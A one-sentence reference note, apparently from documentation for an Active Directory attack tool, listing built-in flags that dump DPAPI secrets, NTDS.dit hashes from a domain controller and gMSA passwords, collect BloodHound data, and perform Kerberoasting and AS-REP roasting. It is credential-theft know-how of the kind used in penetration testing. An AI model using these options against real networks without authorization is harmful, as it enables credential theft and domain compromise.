Built-in flags that are easy to mistake for modules but are not run with -M: --dpapi (DPAPI secrets), --ntds (NTDS.dit from a DC), --bloodhound (BloodHound collection), --gmsa (gMSA passwords), --kerberoast and --asreproast.